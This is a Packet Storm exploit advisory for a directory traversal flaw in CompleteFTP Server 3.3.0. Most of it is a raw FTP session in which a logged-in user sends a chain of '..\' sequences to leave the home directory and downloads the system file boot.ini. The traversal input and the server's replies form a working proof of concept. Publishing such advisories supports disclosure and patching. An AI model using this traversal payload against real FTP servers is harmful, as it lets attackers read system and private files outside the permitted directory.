CompleteFTP version 3.3.0 suffers from a directory traversal vulnerability.
1e3379ace0ea87c468ab6ef78272b39f8948c64d97e4c63a78f56425c0f64930
# Exploit Title: CompleteFTP Server Directory Traversal
# Date: 2010-03-30
# Author: zombiefx darkernet@gmail.com<mailto:darkernet@gmail.com>
# Software Link: http://www.enterprisedt.com/products/completeftp/download/CompleteFTPSetup.exe
# Version: CompleteFTP Server v 3.3.0
# Tested on: Windows XP SP3
# CVE :
# Code :
230 User test logged in.
ftp> pwd
257 "/Home/test" is current directory.
ftp> cd ..\..\..\..\..\..\..\..\
250 Directory changed to "/Home/test/..\..\..\..\..\..\..\..\".
ftp> get boot.ini
200 PORT command successful.
150 Opening ASCII mode data connection for boot.ini
226 Transfer complete.
ftp: 215 bytes received in 0.14Seconds 1.54Kbytes/sec.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed